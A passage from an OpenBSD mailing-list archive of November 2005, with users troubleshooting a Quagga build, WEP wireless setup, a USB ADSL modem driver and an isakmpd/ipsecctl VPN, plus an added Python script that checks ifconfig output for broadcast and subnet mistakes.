'/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/'`/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: `RTM_OLDADD' undeclared here (not in a
function)
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: (near initialization for
`rtm_type_str[8].key')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:79:
error: (near initialization for
`rtm_type_str[8]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: `RTM_OLDDEL' undeclared here (not in a
function)
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: (near initialization for
`rtm_type_str[9].key')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:80:
error: (near initialization for
`rtm_type_str[9]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:81:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:81:
error: (near initialization for
`rtm_type_str[10]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:82:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:82:
error: (near initialization for
`rtm_type_str[11]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:83:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:83:
error: (near initialization for
`rtm_type_str[12]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:84:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:84:
error: (near initialization for
`rtm_type_str[13]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:95:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:95:
error: (near initialization for
`rtm_type_str[14]')
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:97:
error: initializer element is not
constant
/usr/ports/net/quagga/w-quagga-0.96.4p0/quagga-0.96.4/zebra/kernel_socket.c:97:
error: (near initialization for `rtm_type_str[15]')
*** Error code 1
--SNIP---


output from the current snapshot:

--SNIP---
./configure --prefix=/opt/quagga --enable-isisd --enable-ospf-te
--enable-isis-topology --enable-vtysh


Quagga configuration
host operationg system  : openbsd3.8
source code location: .
compiler: gcc
compiler flags  : -Os -fno-omit-frame-pointer -g  -Wall
-Wsign-compare -Wpointer-arith -Wbad-function-cast -Wwrite-strings
-Wmissing-prototypes -Wmissing-declarations -Wchar-subscripts -Wcast-qual
includes:
linker flags:  -lm -lresolv -ltermcap -lreadline
state file directory: /var/run
config file directory   : /opt/quagga/etc
example directory   : /opt/quagga/etc
user to run as  : quagga
group to run as : quagga
group for vty sockets   :
config file mask: 0600
log file mask   : 0600



thread.c: In function `cpu_record_hash_key':
thread.c:91: error: `uintptr_t' undeclared (first use in this function)
thread.c:91: error: (Each undeclared identifier is reported only once
thread.c:91: error: for each function it appears in.)
thread.c:91: e

Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Nikolaus Hiebaum
* Darrin Chandler wrote on Nov 13, 2005 [08:16, -0700] :

> >ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up
> >
> >
> Not sure if it was just a typo in your email, but I think you want the
> nwkey as hex, ... nwid 0xBACE8A21EA ...

* Darrin Chandler wrote on Nov 13, 2005 [08:19, -0700] :

> Typo in *my* last email. You want nwkey as hex, not nwid!

O.K., so I translated the whole BACE8A21EA into 0x42414345384132314541 and gave
it a try.

Same thing as before. ifconfig, netstat and the AP tell me, I am all connected
just fine, but I cannot ping an IP (not even the router).

-- 
Beste Grüße / Best regards,
Nikolaus Hiebaum



Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Darrin Chandler

Typo in *my* last email. You want nwkey as hex, not nwid!

--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/



Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Darrin Chandler

Nikolaus Hiebaum wrote:

> ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up

Not sure if it was just a typo in your email, but I think you want the 
nwkey as hex, ... nwid 0xBACE8A21EA ...


--
Darrin Chandler
[EMAIL PROTECTED]
http://www.stilyagin.com/



Re: OpenBSD as a router for my ADSL ?

2005-11-13 Thread Stuart Henderson
Thanks, I've just looked again at ueagle(4), it looks like the device 
appears as ugen before the firmware is programmed into it. If you 
didn't install it (into /etc/firmware), you need to do so - the files 
are at .


If that doesn't help, I think you also need to send output from 
'usbdevs -v'.


--On 13 November 2005 17:18 +0400, Bruno Carnazzi wrote:


OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel Pentium II ("GenuineIntel" 686-class, 512KB L2 cache) 233 MHz
cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR
real mem  = 33071104 (32296K)
avail mem = 22192128 (21672K)
using 429 buffers containing 1757184 bytes (1716K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(63) BIOS, date 09/07/98, BIOS32 rev. 0 @ 0xfc2c0
apm0 at bios0: Power Management spec V1.2
apm0: battery life expectancy 100%
apm0: AC on, battery charge high, estimated 3:26 hours
apm0: flags 20102 dobusy 0 doidle 1
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xf01c0/96 (4 entries)
pcibios0: PCI Interrupt Router at 000:07:0 ("Intel 82371FB ISA" rev 0x00)
pcibios0: PCI bus #2 is the last bus
WARNING: can't reserve area for I/O APIC.
WARNING: can't reserve area for Local APIC.
bios0: ROM list: 0xc/0xc000
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82443BX" rev 0x02
cbb0 at pci0 dev 2 function 0 "Toshiba ToPIC97 CardBus" rev 0x05: irq 11
cbb1 at pci0 dev 2 function 1 "Toshiba ToPIC97 CardBus" rev 0x05: irq 11
vga1 at pci0 dev 4 function 0 "Chips and Technologies 6" rev 0xc6
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "Intel 82371AB PIIX4 ISA" rev 0x02
pciide0 at pci0 dev 7 function 1 "Intel 82371AB IDE" rev 0x01: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 4126MB, 8452080 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
atapiscsi0 at pciide0 channel 1 drive 0
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
uhci0 at pci0 dev 7 function 2 "Intel 82371AB USB" rev 0x01: irq 11
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
"Intel 82371AB Power" rev 0x02 at pci0 dev 7 function 3 not configured
"Toshiba Fast Infrared Type O" rev 0x23 at pci0 dev 10 function 0 not configured
cardslot0 at cbb0 slot 0 flags 0
cardbus0 at cardslot0: bus 1 device 0 cacheline 0x0, lattimer 0x0
pcmcia0 at cardslot0
cardslot1 at cbb1 slot 1 flags 0
cardbus1 at cardslot1: bus 2 device 0 cacheline 0x0, lattimer 0x0
pcmcia1 at cardslot1
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
sb0 at isa0 port 0x220/24 irq 5 drq 1: dsp v3.01
midi0 at sb0: 
audio0 at sb0
opl0 at sb0: model OPL3
midi1 at opl0: 
wss0 at isa0 port 0x530/8 irq 10 drq 0: CS4231 or AD1845 (vers 4)
audio1 at wss0
pcppi0 at isa0 port 0x61
midi2 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask eb4d netmask eb4d ttymask fbcf
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
ne3 at pcmcia0 function 0 "PCMCIA, FastEthernet, V" port 0xa300/32
ne3: address 00:10:60:f6:71:29
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached




Re: Instructions for tracking -CURRENT

2005-11-13 Thread Alari Kask
> From: Alari Kask <[EMAIL PROTECTED]>
> Date: November 11, 2005 1:51:12 PM GMT+02:00
> To: Nick Holland <[EMAIL PROTECTED]>
> Subject: Re: Instructions for tracking -CURRENT
>
>
> On Nov 11, 2005, at 4:57 AM, Nick Holland wrote:
>
>> Alari Kask wrote:
>> ... [I *refuse* to post that link again]
>>
>> I was right, more damage than good.
>>
>> I *really* wish people would quit accomplishing one little thing,
>> writing it up in "HOWTO" form, and patting themselves on the back and
>> thinking they were doing the world some kind of favor by publishing it.
>>
>> YOU ARE NOT.
>> I pity the fool who thinks that seeing something in print makes it
>> somehow true.  There are a lot of such fools, unfortunately.  "Oh, look,
>> I found it on a web page, it must be true!"
>>
>> In the free world, you have the right to speak and write as you wish,
>> regardless of the accuracy, but I will warn people: THINK, DAMMIT.  Just
>> because someone put it on a web page with an OpenBSD graphic DOES NOT
>> MAKE IT USEFUL or even close to accurate.
>>
>> With this document, you try to lead people on a long path that will only
>> sometimes get them where they want to go, and yet, the direct route
>> (snapshots) is simpler, safer and faster.  The long route has twists and
>> turns you do not warn people about.
>>
>> Nick.
>>
>
> Actually, these instructions were for myself, but I thought I'd
> share it with the community of OpenBSD,
> guess it wasn't such a good idea.
> Yes, installing from a snapshot is easier, but if I want to build a
> specific part of the system, I don't feel like installing the whole
> system just to get that specific part, I'll just build it from source.



Re: OpenBSD as a router for my ADSL ?

2005-11-13 Thread Jonathan Gray
On Sun, Nov 13, 2005 at 12:52:32PM +0300, Bruno Carnazzi wrote:
> Hi all,
> 
> My all-in-one router/switch/ADSL modem/AP just crashed (power
> failure). Damned. Back to my USB modem :( I've also set an OpenBSD 3.8
> box at home, on a Toshiba Laptop (4000CDS, PII-233MHz, 32Mo RAM, 4Go
> IDE HD). Let's rethink our Internet access :)
> 
> Currently, I just have 1 NIC (PCMCIA, works well), but I'll buy a
> second. I'd like to make this OBSD box my filtering router/NAT for my
> Internet access. Here are the scenarios:
> 
>   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized
> it as ugen0 (ueagle seems not to work). Let's admit that it worked: can my
> CPU sustain the PPPoA at 2Mbps? I've read it generates a heavy CPU
> load (maybe because of the USB port). Also, it's a USB 1.0 port. I
> don't think this way is a good idea :)

ueagle seems to not be enabled in the default kernel for some
reason.  You will have to build a custom kernel with it uncommented.

Additionally you will have to install the firmware in the locations
the man page talks about.
http://www.openbsd.org/cgi-bin/man.cgi?query=ueagle&apropos=0&sektion=0&manpath=OpenBSD+Current&arch=i386&format=html

If it still doesn't work after that report back with the output
of usbdevs -v.



Re: OpenBSD Desktop Document

2005-11-13 Thread Derek Tracy
Now that I would have to see. Could you do up a quick sketch in ascii?

On 11/13/05, Robert Szasz <[EMAIL PROTECTED]> wrote:
>
> Add a cutout disk partitioning sliderule! Ok, perhaps not, but now that I
> think about it, that would be a nice geeky tool to have. If anyone else is
> interested, I might just make one up.
>
> On 11/12/05, Derek Tracy <[EMAIL PROTECTED]> wrote:
> >
> > I have to agree, Gentoo's install docs are some of the best out there and
> > will allow just about anybody to install OpenBSD.
> >
> > On 11/12/05, bofh <[EMAIL PROTECTED]> wrote:
> > >
> > > On 11/8/05, Joe S <[EMAIL PROTECTED]> wrote:
> > > >
> > > > In general, this is a good start. One more piece of advice, try not to
> > > > make the document too narrative, but rather just put in what the user
> > > > needs to know to get a desktop working.
> > >
> > >
> > >
> > > One piece of advice, take a look at gentoo's install docs. Just enough
> > > handholding, but with enough background explanation so that a user knows
> > > what's going on.
> > >
> > > -Tai
> > >
> > >
> >
> >
> > --
> > -
> > Derek Tracy
> > [EMAIL PROTECTED]
> > -
> >
> >
>


--
-
Derek Tracy
[EMAIL PROTECTED]
-



Re: OpenBSD as a router for my ADSL ?

2005-11-13 Thread Bruno Carnazzi
OpenBSD 3.8 (GENERIC) #138: Sat Sep 10 15:41:37 MDT 2005
[EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC
cpu0: Intel Pentium II ("GenuineIntel" 686-class, 512KB L2 cache) 233 MHz
cpu0: 
FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36,MMX,FXSR
real mem  = 33071104 (32296K)
avail mem = 22192128 (21672K)
using 429 buffers containing 1757184 bytes (1716K) of memory
mainbus0 (root)
bios0 at mainbus0: AT/286+(63) BIOS, date 09/07/98, BIOS32 rev. 0 @ 0xfc2c0
apm0 at bios0: Power Management spec V1.2
apm0: battery life expectancy 100%
apm0: AC on, battery charge high, estimated 3:26 hours
apm0: flags 20102 dobusy 0 doidle 1
pcibios0 at bios0: rev 2.1 @ 0xf/0x1
pcibios0: PCI IRQ Routing Table rev 1.0 @ 0xf01c0/96 (4 entries)
pcibios0: PCI Interrupt Router at 000:07:0 ("Intel 82371FB ISA" rev 0x00)
pcibios0: PCI bus #2 is the last bus
WARNING: can't reserve area for I/O APIC.
WARNING: can't reserve area for Local APIC.
bios0: ROM list: 0xc/0xc000
cpu0 at mainbus0
pci0 at mainbus0 bus 0: configuration mode 1 (no bios)
pchb0 at pci0 dev 0 function 0 "Intel 82443BX" rev 0x02
cbb0 at pci0 dev 2 function 0 "Toshiba ToPIC97 CardBus" rev 0x05: irq 11
cbb1 at pci0 dev 2 function 1 "Toshiba ToPIC97 CardBus" rev 0x05: irq 11
vga1 at pci0 dev 4 function 0 "Chips and Technologies 6" rev 0xc6
wsdisplay0 at vga1 mux 1: console (80x25, vt100 emulation)
wsdisplay0: screen 1-5 added (80x25, vt100 emulation)
pcib0 at pci0 dev 7 function 0 "Intel 82371AB PIIX4 ISA" rev 0x02
pciide0 at pci0 dev 7 function 1 "Intel 82371AB IDE" rev 0x01: DMA,
channel 0 wired to compatibility, channel 1 wired to compatibility
wd0 at pciide0 channel 0 drive 0: 
wd0: 16-sector PIO, LBA, 4126MB, 8452080 sectors
wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2
atapiscsi0 at pciide0 channel 1 drive 0
scsibus0 at atapiscsi0: 2 targets
cd0 at scsibus0 targ 0 lun 0:  SCSI0 5/cdrom removable
cd0(pciide0:1:0): using PIO mode 4, DMA mode 2
uhci0 at pci0 dev 7 function 2 "Intel 82371AB USB" rev 0x01: irq 11
usb0 at uhci0: USB revision 1.0
uhub0 at usb0
uhub0: Intel UHCI root hub, rev 1.00/1.00, addr 1
uhub0: 2 ports with 2 removable, self powered
"Intel 82371AB Power" rev 0x02 at pci0 dev 7 function 3 not configured
"Toshiba Fast Infrared Type O" rev 0x23 at pci0 dev 10 function 0 not configured
cardslot0 at cbb0 slot 0 flags 0
cardbus0 at cardslot0: bus 1 device 0 cacheline 0x0, lattimer 0x0
pcmcia0 at cardslot0
cardslot1 at cbb1 slot 1 flags 0
cardbus1 at cardslot1: bus 2 device 0 cacheline 0x0, lattimer 0x0
pcmcia1 at cardslot1
isa0 at pcib0
isadma0 at isa0
pckbc0 at isa0 port 0x60/5
pckbd0 at pckbc0 (kbd slot)
pckbc0: using irq 1 for kbd slot
wskbd0 at pckbd0: console keyboard, using wsdisplay0
pms0 at pckbc0 (aux slot)
pckbc0: using irq 12 for aux slot
wsmouse0 at pms0 mux 0
sb0 at isa0 port 0x220/24 irq 5 drq 1: dsp v3.01
midi0 at sb0: 
audio0 at sb0
opl0 at sb0: model OPL3
midi1 at opl0: 
wss0 at isa0 port 0x530/8 irq 10 drq 0: CS4231 or AD1845 (vers 4)
audio1 at wss0
pcppi0 at isa0 port 0x61
midi2 at pcppi0: 
spkr0 at pcppi0
sysbeep0 at pcppi0
lpt0 at isa0 port 0x378/4 irq 7
npx0 at isa0 port 0xf0/16: using exception 16
pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo
fdc0 at isa0 port 0x3f0/6 irq 6 drq 2
fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec
biomask eb4d netmask eb4d ttymask fbcf
pctr: 686-class user-level performance counters enabled
mtrr: Pentium Pro MTRR support
ne3 at pcmcia0 function 0 "PCMCIA, FastEthernet, V" port 0xa300/32
ne3: address 00:10:60:f6:71:29
dkcsum: wd0 matches BIOS drive 0x80
root on wd0a
rootdev=0x0 rrootdev=0x300 rawdev=0x302
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached
ugen0 at uhub0 port 1
ugen0: Analog Devices Eagle II, rev 1.10/50.00, addr 2
ugen0: at uhub0 port 1 (addr 2) disconnected
ugen0 detached

On 11/13/05, Stuart Henderson <[EMAIL PROTECTED]> wrote:
> --On 13 November 2005 12:52 +0300, Bruno Carnazzi wrote:
>
> >   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized
> > it as ugen0 (ueagle seems not to work).
>
> ugen is used where a specific driver can't be found. Send your dmesg.



Re: WLAN (Linksys WPC111) + WEP

2005-11-13 Thread Nikolaus Hiebaum
Hi,

A while ago I posted here for help with my WLAN card (Linksys WPC11 v3). Here
is my setup ...
I have a built-in LAN card (rl0) through which I am usually connected to my
network. Then there is the WLAN card (wi0) which would connect via an Access
Point (AP). All of this is funneled via a Router

rl0 usually has 192.168.0.2
Router 192.168.0.100
wi0 would get 192.168.0.21

This is my netstat -rn and ifconfig in the usual setup (just rl0 connected to
router)

---snip---
Routing tables

Internet:
Destination        Gateway            Flags    Refs      Use    Mtu  Interface
default            192.168.0.100      UGS         5    65505      -  rl0
127/8              127.0.0.1          UGRS        0        0  33224  lo0
127.0.0.1          127.0.0.1          UH          1      396  33224  lo0
192.168.0/24       link#1             UC          2        0      -  rl0
192.168.0.100      0:c:41:c6:1:75     UHLc        1     2180      -  rl0
192.168.0.255      link#1             UHLc        3      848      -  rl0
224/4              127.0.0.1          URS         0        0  33224  lo0

Encap:
Source             Port  Destination        Port  Proto  SA(Address/Proto/Type/Direction)
lo0: flags=8049 mtu 33224
groups: lo
inet 127.0.0.1 netmask 0xff00
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
rl0: flags=8843 mtu 1500
lladdr 00:0a:e4:4a:13:0b
groups: egress
media: Ethernet autoselect (100baseTX full-duplex)
status: active
inet 192.168.0.2 netmask 0xff00 broadcast 192.168.0.255
inet6 fe80::20a:e4ff:fe4a:130b%rl0 prefixlen 64 scopeid 0x1
pflog0: flags=0<> mtu 33224
pfsync0: flags=0<> mtu 1348
enc0: flags=0<> mtu 1536
---snap---

When I want to connect via the wi0, I down the rl0 and give it a whole different
IP. The chain of commands is this:

ifconfig wi0 192.168.0.21 255.255.255.0 nwid scyld nwkey BACE8A21EA up

ifconfig rl0 10.0.0.0

route delete default

route add default 192.168.0.100

I need the nwkey for the WEP (64bit) encryption (open authentication). Both the
AP, as well as ifconfig, suggest that I am connected wirelessly, but I cannot
ping anything.

---snip---
Routing tables

Internet:
Destination        Gateway            Flags    Refs      Use    Mtu  Interface
default            192.168.0.100      UGS         4       72      -  wi0
10/8               link#1             UC          1        0      -  rl0
10.255.255.255     link#1             UHLc        2       42      -  rl0
127/8              127.0.0.1          UGRS        0        0  33224  lo0
127.0.0.1          127.0.0.1          UH          1      396  33224  lo0
192.168.0/24       link#6             UC          2        0      -  wi0
192.168.0.100      link#6             UHRLc       1        0      -  wi0
192.168.0.255      link#6             UHLc        3       21      -  wi0
224/4              127.0.0.1          URS         0        0  33224  lo0


lo0: flags=8049 mtu 33224
groups: lo
inet 127.0.0.1 netmask 0xff00
inet6 ::1 prefixlen 128
inet6 fe80::1%lo0 prefixlen 64 scopeid 0x5
rl0: flags=8843 mtu 1500
lladdr 00:0a:e4:4a:13:0b
groups: egress
media: Ethernet autoselect (100baseTX full-duplex)
status: active
inet 192.168.0.2 netmask 0xff00 broadcast 192.168.0.255
inet6 fe80::20a:e4ff:fe4a:130b%rl0 prefixlen 64 scopeid 0x1
pflog0: flags=0<> mtu 33224
pfsync0: flags=0<> mtu 1348
enc0: flags=0<> mtu 1536
wi0: flags=8843 mtu 1500
lladdr 00:06:25:2b:55:5c
media: IEEE802.11 autoselect (DS2)
status: active
ieee80211: nwid scyld nwkey  5dBm (auto)
inet6 fe80::206:25ff:fe2b:555c%wi0 prefixlen 64 scopeid 0x6
inet 192.168.0.21 netmask 0xff00 broadcast 255.255.255.0
---snap---

And still I cannot ping anything. As soon as I turn off WEP and have an
unencrypted AP, I can ping. What am I missing here? Both ifconfig and the AP
tell me that I am connected, and netstat says the routes are fine. What's the
problem here?

-- 
Beste Grüße / Best regards,
Nikolaus Hiebaum
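An added diagnostic, not from the post and not an OpenBSD tool, that parses ifconfig output of the shape quoted above and flags two things the second ifconfig listing shows: a broadcast address that does not match the address and netmask (wi0 reports broadcast 255.255.255.0 after the bare second argument on the ifconfig line), and two up interfaces whose connected subnets overlap (rl0 still holds 192.168.0.2/24 while wi0 holds 192.168.0.21/24). The sample output is constructed to mirror the post, with the netmask written out in full as 0xffffff00.

```python
"""Sanity checks over OpenBSD ifconfig output (added example; the sample
below is constructed to mirror the mailing-list post, not copied from it)."""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constructed sample: rl0 still carries its old address while wi0 was
# configured with a bare second address, so the kernel took 255.255.255.0
# as the broadcast address instead of as a netmask.
SAMPLE_IFCONFIG = """\
lo0: flags=8049<UP,LOOPBACK,RUNNING,MULTICAST> mtu 33224
        inet 127.0.0.1 netmask 0xff000000
rl0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 192.168.0.2 netmask 0xffffff00 broadcast 192.168.0.255
wi0: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet 192.168.0.21 netmask 0xffffff00 broadcast 255.255.255.0
"""

IFACE_RE = re.compile(r"^(\w+): flags=")
INET_RE = re.compile(
    r"^\s+inet (\d+\.\d+\.\d+\.\d+) netmask (0x[0-9a-fA-F]+)"
    r"(?: broadcast (\d+\.\d+\.\d+\.\d+))?")


@dataclass
class InetAddr:
    ifname: str
    iface: ipaddress.IPv4Interface          # address plus prefix length
    broadcast: Optional[ipaddress.IPv4Address]


def parse_ifconfig(text: str) -> List[InetAddr]:
    """Collect every IPv4 address block, remembering which interface owns it."""
    entries: List[InetAddr] = []
    current = None
    for line in text.splitlines():
        m = IFACE_RE.match(line)
        if m:
            current = m.group(1)
            continue
        m = INET_RE.match(line)
        if m and current:
            addr, mask_hex, bcast = m.groups()
            # ifconfig prints the mask as hex; ipaddress wants dotted form.
            mask = ipaddress.IPv4Address(int(mask_hex, 16))
            iface = ipaddress.IPv4Interface(f"{addr}/{mask}")
            entries.append(InetAddr(
                current, iface,
                ipaddress.IPv4Address(bcast) if bcast else None))
    return entries


def broadcast_mismatches(entries: List[InetAddr]) -> List[Tuple[str, str, str]]:
    """(ifname, configured broadcast, expected broadcast) for every address
    whose broadcast is not the directed broadcast of its own subnet."""
    bad = []
    for e in entries:
        if e.broadcast is None:
            continue
        expected = e.iface.network.broadcast_address
        if e.broadcast != expected:
            bad.append((e.ifname, str(e.broadcast), str(expected)))
    return bad


def overlapping_subnets(entries: List[InetAddr]) -> List[Tuple[str, str, str]]:
    """Pairs of distinct interfaces whose connected subnets overlap; the
    kernel can only point the connected route at one of them."""
    found = []
    for i, a in enumerate(entries):
        for b in entries[i + 1:]:
            if a.ifname != b.ifname and a.iface.network.overlaps(b.iface.network):
                # Report the more specific of the two prefixes.
                net = max(a.iface.network, b.iface.network,
                          key=lambda n: n.prefixlen)
                found.append((a.ifname, b.ifname, str(net)))
    return found


if __name__ == "__main__":
    addrs = parse_ifconfig(SAMPLE_IFCONFIG)
    for ifn, got, want in broadcast_mismatches(addrs):
        print(f"{ifn}: broadcast {got} but subnet broadcast is {want}")
    for x, y, net in overlapping_subnets(addrs):
        print(f"{x} and {y} both claim {net}")
```

Run against a live `ifconfig -A` (or `ifconfig -a` on newer releases) the same checks apply to any number of interfaces.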



Re: vpn between OpenBSD and Linux/Openswan with x509 certs

2005-11-13 Thread Tom K

Apologies for my formatting. To clarify:

laptop = 10.12.62.99
ipcop = 10.12.62.1

Tom K wrote:

I'm a complete beginner with OpenBSD, and I've just installed 3.8 on 
my laptop principally to learn the OpenBSD way of doing IPsec i.e. 
isakmpd and ipsecctl. My goal is to create a tunnel between OpenBSD 
and my existing Openswan system (IPCop 1.4.10) using x509 certs. I 
have a reasonably good understanding of Openswan, so basically I'm 
trying to understand the specifics of isakmpd/ipsecctl, rather than 
the underlying concepts.


Here's where I am so far:
ipsecctl has just been introduced in 3.8 to simplify ipsec operations. 
It obsoletes isakmpd.conf. I can run isakmpd with no conf file, and 
ipsecctl with the following ipsec.conf file:


ike esp from 10.12.62.99 to 0.0.0.0/0 peer 10.12.62.1
                  |                          |
               laptop                      ipcop

and I get some familiar-looking responses in Openswan's logs - so far 
so good. No tunnel, but that's OK for the moment.


What I'm not clear on is where I define the certs, if isakmpd.conf is 
no longer in use. There's no mention of them in man ipsecctl. Maybe I 
still need something like this in isakmpd.conf:


# Certificates stored in PEM format
  [X509-certificates]
  CA-directory=/etc/isakmpd/ca/
  Cert-directory=/etc/isakmpd/certs/
  Private-key=/etc/isakmpd/private/openbsd1.as10.net.priv

Am I on the right track? I would really appreciate any suggestions.

Thanks
Tom K.




Re: OpenBSD as a router for my ADSL ?

2005-11-13 Thread Stuart Henderson

--On 13 November 2005 12:52 +0300, Bruno Carnazzi wrote:


>   * Try to use this SAGEM [EMAIL PROTECTED] 800 E2L. Uhm... OBSD recognized it
> as ugen0 (ueagle seems not to work).


ugen is used where a specific driver can't be found. Send your dmesg.



vpn between OpenBSD and Linux/Openswan with x509 certs

2005-11-13 Thread Tom K
I'm a complete beginner with OpenBSD, and I've just installed 3.8 on my 
laptop principally to learn the OpenBSD way of doing IPsec i.e. isakmpd 
and ipsecctl. My goal is to create a tunnel between OpenBSD and my 
existing Openswan system (IPCop 1.4.10) using x509 certs. I have a 
reasonably good understanding of Openswan, so basically I'm trying to 
understand the specifics of isakmpd/ipsecctl, rather than the underlying 
concepts.


Here's where I am so far:
ipsecctl has just been introduced in 3.8 to simplify ipsec operations. It 
obsoletes isakmpd.conf. I can run isakmpd with no conf file, and 
ipsecctl with the following ipsec.conf file:


ike esp from 10.12.62.99 to 0.0.0.0/0 peer 10.12.62.1
                  |                          |
               laptop                      ipcop

and I get some familiar-looking responses in Openswan's logs - so far so 
good. No tunnel, but that's OK for the moment.


What I'm not clear on is where I define the certs, if isakmpd.conf is no 
longer in use. There's no mention of them in man ipsecctl. Maybe I still 
need something like this in isakmpd.conf:


# Certificates stored in PEM format
  [X509-certificates]
  CA-directory=/etc/isakmpd/ca/
  Cert-directory=/etc/isakmpd/certs/
  Private-key=/etc/isakmpd/private/openbsd1.as10.net.priv

Am I on the right track? I would really appreciate any suggestions.

Thanks
Tom K.



Re: Compaq ARMADA 100S with D-Link DFE-670TXD

2005-11-13 Thread Bruno Carnazzi
Hello,

